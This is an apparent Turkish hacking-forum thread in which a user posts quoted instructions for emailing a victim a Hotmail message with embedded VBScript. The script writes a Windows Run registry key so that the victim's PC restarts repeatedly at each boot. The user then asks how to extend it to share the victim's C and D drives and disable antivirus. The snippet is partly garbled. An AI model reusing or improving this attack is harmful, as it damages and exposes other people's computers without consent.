mailden pc yi paylaşıma açma

mikrop_2

Yeni üye
14 Nis 2007
13
0
Hotmaile gir yeni mesaj yarata gir.Kime bölümüne kurbanın mail adresini yaz.
konuya ilgi çekici bişey yaz. mesaj bölümüne de mesajıı yaz ve sonra alttaki kodu ekle

Kod:
******** language=\"vbscript\">
on error resume next
dim kutluk
set kutluk=CreateObject(\"Wscript.Shell\"

kutluk.RegWrite \"HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32\",\"shutdown -r\"

</script>



bu kod gönderdiğin kişinin maili açmasıyla gönderdiğim kodlar devreye girecek ne işe yarar diye sorucaksın tabi gönderdiğin kişinin pc\'yi yeniden başlatmasıyla yada pc yi açtığında sistem uyarısı gelecek ve tüm uygulamanızı kapatın diyecek
yani pc her açıldığında 24 saniyede bir kapanacak olay bu.


ALINTIDIR!!

arkadaşalr bu kod düzenlenip mail açıldığından c ve d eyi paylaşıma acıp antivirüsü devre dışı bırakma gibi bi imkanmız varmı ?
 

mikrop_2

Yeni üye
14 Nis 2007
13
0
arkadaşım teşekkür edilcek birşey yazmadım sadece soru sordum msj sayınız artsın die ota b.ka tşkkür esiyosunuz.. forumun seviyesi düşüyor..modlar böyle şeyler yasak değil mi?
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.